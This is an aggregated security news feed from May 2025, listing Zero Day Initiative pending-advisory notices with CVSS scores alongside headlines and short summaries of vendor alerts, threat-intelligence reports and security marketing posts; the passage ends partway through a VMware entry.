http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27208: Tencent
2025-05-22T05:00:00Z | 1747890000

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27191: Tencent
2025-05-22T05:00:00Z | 1747890000

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27190: Tencent
2025-05-22T05:00:00Z | 1747890000

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27183: Tencent
2025-05-22T05:00:00Z | 1747890000

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27186: Tencent
2025-05-22T05:00:00Z | 1747890000

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27192: Tencent
2025-05-22T05:00:00Z | 1747890000

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27197: Tencent
2025-05-22T05:00:00Z | 1747890000

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27184: Tencent
2025-05-22T05:00:00Z | 1747890000

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27185: Tencent
2025-05-22T05:00:00Z | 1747890000

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-25875: Delta Electronics
2025-05-22T05:00:00Z | 1747890000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Guillaume Orlando' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26843: Delta Electronics
2025-05-22T05:00:00Z | 1747890000

A CVSS score 7.3 AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27088: NI
2025-05-22T05:00:00Z | 1747890000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27091: NI
2025-05-22T05:00:00Z | 1747890000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27092: NI
2025-05-22T05:00:00Z | 1747890000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27209: NVIDIA
2025-05-22T05:00:00Z | 1747890000

A CVSS score 7.3 AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27201: NVIDIA
2025-05-22T05:00:00Z | 1747890000

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27210: NVIDIA
2025-05-22T05:00:00Z | 1747890000

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27199: NVIDIA
2025-05-22T05:00:00Z | 1747890000

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
Leading Israeli Law Firm Prevents Malware Intrusion and Data Leaks with OPSWAT
2025-05-22T04:30:00Z | 1747888200

FISCHER (FBC & Co.) law firm uses OPSWAT MetaDefender MFT and Kiosk to securely manage millions of files.

https://www.opswat.com/blog/leading-israeli-law-firm-prevents-malware-intrusion-and-data-leaks-with-opswat
Security Alert (A25-05-16): Multiple Vulnerabilities in Google Chrome
2025-05-22T04:00:00Z | 1747886400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-05-17): Multiple Vulnerabilities in Cisco Products
2025-05-22T04:00:00Z | 1747886400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Event Wrap-Up: MetaDefender Platform Bootcamp Returns to Dubai
2025-05-22T03:56:00Z | 1747886160

From May 13 to 15, OPSWAT Academy hosted its latest MetaDefender Platform Bootcamp in Dubai, bringing together cybersecurity professionals from across the MENA region for three days of immersive, hands-on training.

https://www.opswat.com/blog/event-wrap-up-metadefender-platform-bootcamp-returns-to-dubai
Google Chrome Multiple Vulnerabilities
2025-05-22T03:00:00Z | 1747882800

Multiple vulnerabilities were identified in Google Chrome. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition and remote code execution on the targeted system.   [Updated on 2025-05-26] Updated Impact and Description. Impact Denial of Service Remote Code Execution System / Technologies affected Google Chrome prior to 137.0.7151.40/.41 (Mac) Google Chrome prior to 137.0.7151.40/.41 (Windows) Solutions Before installation of the software, please visit the software vendor web-site for more details. Apply fixes issued by the vendor: Update to version 137.0.7151.40/.41 (Mac) or later Update to version 137.0.7151.40/.41 (Windows) or later

https://www.hkcert.org/security-bulletin/google-chrome-security-restriction-bypass-vulnerability_20250522
GitLab Multiple Vulnerabilities
2025-05-22T03:00:00Z | 1747882800

Multiple vulnerabilities were identified in GitLab. A remote attacker could exploit some of these vulnerabilities to trigger sensitive information disclosure, denial of service condition and security restriction bypass on the targeted system. Impact Denial of Service Security Restriction Bypass Information Disclosure System / Technologies affected GitLab Community Edition (CE) versions prior to 18.0.1, 17.11.3, and 17.10.7 GitLab Enterprise Edition (EE) versions prior to 18.0.1, 17.11.3, and 17.10.7 Solutions Before installation of the software, please visit the vendor web-site for more details.   Apply fixes issued by the vendor: https://about.gitlab.com/releases/2025/05/21/patch-release-gitlab-18-0-1-released/

https://www.hkcert.org/security-bulletin/gitlab-multiple-vulnerabilities_20250522
Introducing the Silent Push Chrome Extension
2025-05-22T00:05:53Z | 1747872353

The Silent Push Chrome Extension allows you to scan, extract, save, and analyse DNS and web content data in Silent Push Enterprise direct from a Chrome window, without switching between tools or tabs.  Security teams and researchers can use the extension to gather Indicators of Future Attack™ (IOFA™) intelligence from a browser, and connect the dots […] The post Introducing the Silent Push Chrome Extension appeared first on Silent Push.

https://www.silentpush.com/blog/chrome-extension/
Russia-Aligned TAG-110 Targets Tajikistan with Macro-Enabled Word Documents
2025-05-22T00:00:00Z | 1747872000

Russia-aligned TAG-110 shifts to .dotm phishing lures in a 2025 campaign against Tajikistan’s public sector, advancing cyber-espionage in Central Asia.

https://www.recordedfuture.com/research/russia-aligned-tag-110-targets-tajikistan-with-macro-enabled
OEM Partnerships: Definition, Benefits, & Roles Explained
2025-05-22T00:00:00Z | 1747872000

OEM partners are foundational in industries such as industrial manufacturing, cybersecurity, and software, where high-quality, scalable production and deep technical integration are essential.

https://www.opswat.com/blog/oem-partnerships
Is AI the Right Tool to Defend Against Modern Cyberattacks? by Jesse Kimbrel
2025-05-22T00:00:00Z | 1747872000

See how defenders are agentic AI and Gen AI are quickly becoming useful tools for cybersecurity teams defending modern networks from modern attacks.

https://www.vectra.ai/blog/is-ai-the-right-tool-to-defend-against-modern-cyberattacks
Smashing Security podcast #418: Grid failures, Instagram scams, and Legal Aid leaks
2025-05-21T23:00:32Z | 1747868432

In this week’s episode, Graham investigates the mysterious Iberian Peninsula blackout (aliens? toaster? cyberattack?), Carole dives in the UK legal aid hack that exposed deeply personal data of society's most vulnerable, and Dinah Davis recounts how Instagram scammers hijacked her daughter’s account - and how a parental control accidentally saved the day.

https://grahamcluley.com/smashing-security-podcast-418/
Cybersecurity Compliance Playbook: Standards, Requirements, and Best Practices
2025-05-21T21:47:00Z | 1747864020

Cyber events have become the top business risk worldwide – and it’s no mystery why. As ransomware doubles, data breach costs soar, and compliance mandates multiply, security teams are facing more pressure – and more complexity – than ever before. On the upside, 60% of executives say cyber regulations effectively reduce risk, and 96% acknowledge that regulatory requirements have spurred them to enhance security measures. But, while regulation has helped reduce risk, the…

https://zeronetworks.com/blog/cybersecurity-compliance-playbook-standards-requirements-best-practices
CVE-2025-0133 PAN-OS: Reflected Cross-Site Scripting (XSS) Vulnerability in GlobalProtect Gateway and Portal (Severity: LOW)
2025-05-21T20:30:00Z | 1747859400

CVE-2025-0133 PAN-OS: Reflected Cross-Site Scripting (XSS) Vulnerability in GlobalProtect Gateway and Portal (Severity: LOW)

https://security.paloaltonetworks.com/CVE-2025-0133
“Microsoft has simply given us no other option,” Signal says as it blocks Windows Recall
2025-05-21T20:21:39Z | 1747858899

Even after its refurbishing, Recall provides few ways to exclude specific apps.

https://arstechnica.com/security/2025/05/signal-resorts-to-weird-trick-to-block-windows-recall-in-desktop-app/
Cisco security advisory (AV25-288)
2025-05-21T20:16:13Z | 1747858573

https://cyber.gc.ca/en/alerts-advisories/cisco-security-advisory-av25-288
GitLab security advisory (AV25-287)
2025-05-21T20:07:21Z | 1747858041

https://cyber.gc.ca/en/alerts-advisories/gitlab-security-advisory-av25-287
Apple legend Jony Ive takes control of OpenAI’s design future
2025-05-21T19:21:51Z | 1747855311

$6.5B acquisition of Ive's firm puts him in charge of moving OpenAI "beyond screens."

https://arstechnica.com/information-technology/2025/05/apple-legend-jony-ive-takes-control-of-openais-design-future/
The Rise of the LLM AI Scrapers: What It Means for Bot Management
2025-05-21T19:00:00Z | 1747854000

Explore the rise of LLM AI scrapers and learn how to adapt to growing bot traffic with data-backed insights from our research.

https://www.akamai.com/blog/security/2025/may/rise-llm-ai-scrapers-bot-management
Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations
2025-05-21T19:00:00Z | 1747854000

Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations

https://www.ic3.gov/CSA/2025/250521-2.pdf
Sophos Firewall v21.5: Streamlined management
2025-05-21T18:40:32Z | 1747852832

How to make the most of the new features in Sophos Firewall v21.5.

https://news.sophos.com/en-us/2025/05/21/sophos-firewall-v21-5-streamlined-management/
Asset Discovery and Risk Mapping in Cybersecurity Operations using Deception
2025-05-21T18:22:39Z | 1747851759

Discover how deception enhances asset discovery, maps cyber terrain, and detects threats early across hybrid, cloud, and IoT environments. The post Asset Discovery and Risk Mapping in Cybersecurity Operations using Deception appeared first on Fidelis Security.

https://fidelissecurity.com/threatgeek/deception/asset-discovery-and-risk-mapping-using-deception/
Why SASE Transforms Security
2025-05-21T17:38:13Z | 1747849093

This blog captures a presentation delivered by Versa’s Chief Marketing Officer at RSAC 2025. Presented live at the Versa booth, it outlines why SASE is transforming enterprise security – and how Versa uniquely delivers on that transformation with its unified, AI-powered platform. The post Why SASE Transforms Security first appeared on The Versa Networks Blog.

https://versa-networks.com/blog/why-sase-transforms-security/
ESET takes part in global operation to disrupt Lumma Stealer
2025-05-21T16:15:00Z | 1747844100

Our intense monitoring of tens of thousands of malicious samples helped this global disruption operation

https://www.welivesecurity.com/en/eset-research/eset-takes-part-global-operation-disrupt-lumma-stealer/
Simplifying DORA Compliance with the Qualys Enterprise TruRisk™ Platform
2025-05-21T16:14:28Z | 1747844068

Strengthening Resilience for the Financial Sector The Digital Operational Resilience Act (DORA) is a landmark EU regulation that establishes a unified framework for managing technology risk in the financial sector. It’s designed to ensure that banks, insurers, investment firms, and other financial entities can withstand, respond to, and recover from all types of ICT-related disruptions—from […]

https://blog.qualys.com/category/product-tech
Lumma Stealer: Breaking down the delivery techniques and capabilities of a prolific infostealer
2025-05-21T16:00:00Z | 1747843200

Over the past year, Microsoft Threat Intelligence observed the persistent growth and operational sophistication of Lumma Stealer, an info-stealing malware used by multiple financially motivated threat actors to target various industries. Microsoft, partnering with others across industry and international law enforcement, facilitated the disruption of Lumma infrastructure. The post Lumma Stealer: Breaking down the delivery techniques and capabilities of a prolific infostealer appeared first on Microsoft Security Blog.

https://www.microsoft.com/en-us/security/blog/2025/05/21/lumma-stealer-breaking-down-the-delivery-techniques-and-capabilities-of-a-prolific-infostealer/
Facing the cyber threat behind the headlines
2025-05-21T15:50:04Z | 1747842604

NCSC CEO urges all businesses to face the stark reality of the cyber threat they face, whether in the spotlight or not.

https://www.ncsc.gov.uk/blog-post/cyber-threat-behind-the-headlines
Microsoft ramps up zero trust capabilities amid agentic AI push
2025-05-21T15:00:00Z | 1747839600

The move from Microsoft looks to bolster agent security and prevent misuse

https://www.itpro.com/security/microsoft-ramps-up-zero-trust-capabilities-amid-agentic-ai-push
Broadcom Named One of America’s Best Cybersecurity Companies 2025
2025-05-21T14:20:00Z | 1747837200

Newsweek and Statista R call Broadcom “most outstanding” across five critical security categories

https://www.security.com/feature-stories/broadcom-named-one-americas-best-cybersecurity-companies-2025
Getting started with Conditional Access: Comparing Entra ID Conditional Access with Cisco Duo Security
2025-05-21T14:12:20Z | 1747836740

Everything you need to know about the differences between conditional access policies in Microsoft Entra ID and Cisco Duo.

https://redcanary.com/blog/security-operations/conditional-access-cisco-duo/
SAP Tells Companies Facing Big Challenges: We Are on Your Side
2025-05-21T14:10:00Z | 1747836600

A raft of new AI tools, business apps, and partnerships will help customers bring out their best.

https://news.sap.com/2025/05/sap-sapphire-companies-facing-big-challenges-we-are-on-your-side/
BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory
2025-05-21T14:00:00Z | 1747836000

Akamai researchers found a privilege escalation vulnerability in Windows Server 2025 that allows attackers to compromise any user in Active Directory.

https://www.akamai.com/blog/security-research/2025/may/abusing-dmsa-for-privilege-escalation-in-active-directory
Vulnerabilities impacting SAP NetWeaver (CVE-2025-31324 and CVE-2025-42999)
2025-05-21T13:16:01Z | 1747833361

https://cyber.gc.ca/en/alerts-advisories/vulnerabilities-impacting-sap-netweaver-cve-2025-31324-cve-2025-42999
Why DragonForce is growing in prominence – with retailer attacks boosting its reputation
2025-05-21T13:14:56Z | 1747833296

Unusually low profit share demands and broad infrastructure could rocket the group into infamy

https://www.itpro.com/security/cyber-attacks/dragonforce-growing-prominence-retailer-attacks-reputation
Cortex Cloud — Unified Efficiency, Now with Dual FedRAMP Authority
2025-05-21T13:00:57Z | 1747832457

Cortex Cloud achieved FedRAMP High and Moderate authorizations since its Feb 2025 launch, highlighting its secure cloud commitment. The post Cortex Cloud — Unified Efficiency, Now with Dual FedRAMP Authority appeared first on Palo Alto Networks Blog.

https://www.paloaltonetworks.com/blog/2025/05/cortex-cloud-dual-fedramp-authority/
DragonForce targets rivals in a play for dominance
2025-05-21T13:00:28Z | 1747832428

Not content with attacking retailers, this aggressive group is fighting a turf war with other ransomware operators

https://news.sophos.com/en-us/2025/05/21/dragonforce-targets-rivals-in-a-play-for-dominance/
Joint advisory on Russian cyber campaign targeting logistics providers and IT companies
2025-05-21T13:00:28Z | 1747832428

https://cyber.gc.ca/en/news-events/joint-advisory-russian-cyber-campaign-targeting-logistics-providers-companies
Driving Resiliency with Warrior Canine Connection
2025-05-21T13:00:00Z | 1747832400

Commvault announces new partnership with organization supporting combat veterans. The post Driving Resiliency with Warrior Canine Connection appeared first on Commvault - English - United States.

https://www.commvault.com/blogs/driving-resiliency-with-warrior-canine-connection
Dragos Industrial Ransomware Analysis: Q1 2025
2025-05-21T13:00:00Z | 1747832400

Our recent blog highlighting the latest Dragos Knowledge Pack explored critical advancements in ransomware detection capabilities for the Dragos Platform,... The post Dragos Industrial Ransomware Analysis: Q1 2025 first appeared on Dragos.

https://www.dragos.com/blog/dragos-industrial-ransomware-analysis-q1-2025/
DDoS Attacks Disrupt Vital Payment Services Across Europe: A Wake-Up Call for Financial Infrastructure
2025-05-21T13:00:00Z | 1747832400

In the week of April 21–25, 2025, a wave of Distributed Denial-of-Service (DDoS) attacks swept across Europe, targeting critical financial infrastructure and disrupting services for millions of users. These incidents underscore the growing cyber threat landscape and the urgent need for robust, always-on protection for digital financial services.

https://blog.riskrecon.com/ddos-attacks-disrupt-vital-payment-services-across-europe-a-wake-up-call-for-financial-infrastructure
What’s New in Graylog 6.2 Webinar
2025-05-21T12:59:08Z | 1747832348

What’s New Graylog 6.2: SIEM & Log Management — Without Compromise Update: Replay available When: Wednesday, May 28, 11AM ET Who: Graylog Enterprise & Security customers and  Graylog Open users Join us for an exclusive dive into Graylog 6.2 Spring ’25 Release, purpose-built to eliminate the trade-offs traditional Log Management and SIEMs force on your IT, […] The post What’s New in Graylog 6.2 Webinar appeared first on Graylog.

https://graylog.org/post/whats-new-in-graylog-6-2-webinar/
Shape the Future of Intelligent Applications with SAP Business Data Cloud
2025-05-21T12:30:00Z | 1747830600

A new wave of intelligent applications are reshaping how organizations operate.

https://news.sap.com/2025/05/future-intelligent-applications-sap-business-data-cloud/
Simplifying Success: Unveiling SAP’s Upcoming Services and Support Engagement Model
2025-05-21T12:30:00Z | 1747830600

We are sharing a major evolution of our SAP Services and Support portfolio.

https://news.sap.com/2025/05/simplify-success-services-support-engagement-model/
Cato CTRL™ Threat Research: Suspected Russian Threat Actors Leverage Tigris, Oracle Cloud Infrastructure, and Scaleway to Target Privileged Users with Lumma Stealer
2025-05-21T12:26:14Z | 1747830374

Executive Summary   Imagine walking into a trusted bank, only to be handed counterfeit money by employees who don’t realize it’s fake. This is similar to a growing trend that’s emerging in the threat landscape. Threat actors are leveraging trusted cloud infrastructure platforms to host fake reCAPTCHA pages designed to deceive unsuspecting victims into executing malicious... The post Cato CTRL™ Threat Research: Suspected Russian Threat Actors Leverage Tigris, Oracle Cloud Infrastructure, and Scaleway to Target Privileged Users with Lumma Stealer  appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-ctrl-suspected-russian-threat-actors/
CC-4660 - Broadcom Releases Security Updates for VMware vCenter Server and Cloud Foundation Vulnerabilities
2025-05-21T11:35:00Z | 1747827300

Severity: Medium Advisory addresses two critical vulnerabilities that could lead to arbitrary code execution and allow unauthorised access to internal VMware Cloud Foundation services Advisory addresses two critical vulnerabilities that could lead to arbitrary code execution and allow unauthorised access to internal VMware Cloud Foundation services Updated: 21 May 2025

https://digital.nhs.uk/cyber-alerts/2025/cc-4660
Multiple vulnerabilities in Proget software
2025-05-21T11:00:00Z | 1747825200

CERT Polska has received a report about 7 vulnerabilities (from CVE-2025-1415 to CVE-2025-1421) found in Proget software.

https://cert.pl/en/posts/2025/05/CVE-2025-1415/
Active Directory & Microsoft Entra ID Attacks: The Hybrid Cloud Conundrum
2025-05-21T10:34:49Z | 1747823689

Based on recent attacks, we need to talk about a troubling pattern that’s emerging. A common scenario is playing out in hybrid cloud environments that security teams need to address urgently. Adversaries like Scattered Spider are getting more popular due to this attack pattern. Most companies today are moving employee identity to the cloud, often […] The post Active Directory & Microsoft Entra ID Attacks: The Hybrid Cloud Conundrum appeared first on CounterCraft.

https://www.countercraftsec.com/blog/active-directory-attacks-hybrid-cloud-conundrum/
Everything we know about the Peter Green Chilled cyber attack
2025-05-21T10:20:00Z | 1747822800

A ransomware attack on the chilled food distributor highlights the supply chain risks within the retail sector

https://www.itpro.com/security/ransomware/everything-we-know-about-the-peter-green-chilled-cyber-attack
Dero miner zombies biting through Docker APIs to build a cryptojacking horde
2025-05-21T10:00:47Z | 1747821647

Kaspersky experts break down an updated cryptojacking campaign targeting containerized environments: a Dero crypto miner abuses the Docker API.

https://securelist.com/dero-miner-infects-containers-through-docker-api/116546/
Top ways to ensure your content performs well in Google's AI experiences on Search
2025-05-21T10:00:00Z | 1747821600

As a site owner, publisher or creator, you may be wondering how to best succeed in our AI search experiences, such as AI Overviews and our new AI Mode. The underpinnings of what Google has long advised carries across to these new experiences. Focus on your visitors and provide them with unique, satisfying content. Then you should be well positioned as Google Search evolves, as our core goal remains the same: to help people find outstanding, original content that adds unique value. With that in mind, here are some things to consider for success in Google Search all around, including our AI experiences.

https://developers.google.com/search/blog/2025/05/succeeding-in-ai-search
The UK’s science funding agency is being bombarded with cyber attacks
2025-05-21T08:50:00Z | 1747817400

Government bodies face increasing threats from state-sponsored espionage groups

https://www.itpro.com/security/cyber-attacks/the-uks-science-funding-agency-is-being-bombarded-with-cyber-attacks
From Track to Tech: Powered by AI
2025-05-21T08:40:26Z | 1747816826

The post From Track to Tech: Powered by AI appeared first on Cato Networks.

https://www.catonetworks.com/resources/from-track-to-tech-webinar/
Tänaseks on mobiiliga hääletamist testinud 1518 inimest
2025-05-21T08:11:34Z | 1747815094

Eilsest, 20. maist kuni neljapäeva, 22. maini viivad Riigi Infosüsteemi Amet (RIA) ja riigi valimisteenistus läbi telefonidele arendatud e-hääletamise rakenduse prototüübi avaliku testi. Tänahommikuse seisuga on mobiiliga hääletamist testinud 1518 inimest, neist 1076 olid mehed ja 442 naised. Hääletada saab neljapäeval kella 20.00ni.

https://ria.ee/uudised/tanaseks-mobiiliga-haaletamist-testinud-1518-inimest
CrowdStrike announces integration with Nvidia Enterprise AI Factory
2025-05-21T07:46:00Z | 1747813560

Organizations can now leverage CrowdStrike protection within Nvidia Enterprise AI Factory deployments

https://www.itpro.com/security/crowdstrike-announces-integration-with-nvidia-enterprise-ai-factory
VMware vCenter Server Command Execution Vulnerability (CVE-2025-41225)
2025-05-21T07:16:55Z | 1747811815

Overview Recently, NSFOCUS CERT detected that VMware issued a security bulletin to fix the command execution vulnerability (CVE-2025-41225) of VMware vCenter Server; Due to an authenticated command execution vulnerability in VMware vCenter Server, an attacker with permissions to create or modify alerts and run scripts can exploit this vulnerability to execute arbitrary commands on the […] The post VMware vCenter Server Command Execution Vulnerability (CVE-2025-41225) appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/vmware-vcenter-server-command-execution-vulnerability-cve-2025-41225/
What’s New Device Platform Intelligence on May 21, 2025
2025-05-21T06:43:27Z | 1747809807

Go to Device Platform Intelligence Added Platforms 104 Platforms are added Platform Name Node Type2 Node Type 3onedata IES6300-8GP2GS2HS-2P48-240W Switch Switch Switch AB Regin HCA152DW-4 HVAC Controller HVAC IoT/OT AB Regin HCA283WM-4 HVAC Controller HVAC IoT/OT AB Regin Rego 5200 Controller ICS/OT IoT/OT AXIS F34 Main Unit Security Camera Security Appliance Accuenergy AXM-WEB2 Communication Module […]

https://www.genians.com/dpi/dpi-update-notice/device-platform-intelligence-update-notice-may-21-2025/
ZDI-CAN-26836: AzeoTech
2025-05-21T05:00:00Z | 1747803600

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-05-21, 16 days ago. The vendor is given until 2025-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27165: DataChain
2025-05-21T05:00:00Z | 1747803600

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-21, 16 days ago. The vendor is given until 2025-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27163: Oracle
2025-05-21T05:00:00Z | 1747803600

A CVSS score 8.2 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Viettel Cyber Security' was reported to the affected vendor on: 2025-05-21, 16 days ago. The vendor is given until 2025-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27122: Oracle
2025-05-21T05:00:00Z | 1747803600

A CVSS score 8.2 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Prison Break(GANGMIN KIM,SANGBIN KIM,HANSEO KIM,SANGWON OH,SANGHOON LEE, WONJOON HWANG)' was reported to the affected vendor on: 2025-05-21, 16 days ago. The vendor is given until 2025-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26031: Fuji Electric
2025-05-21T05:00:00Z | 1747803600

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'kimiya' was reported to the affected vendor on: 2025-05-21, 16 days ago. The vendor is given until 2025-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27157: VMware
2025-05-21T05:00:00Z | 1747803600

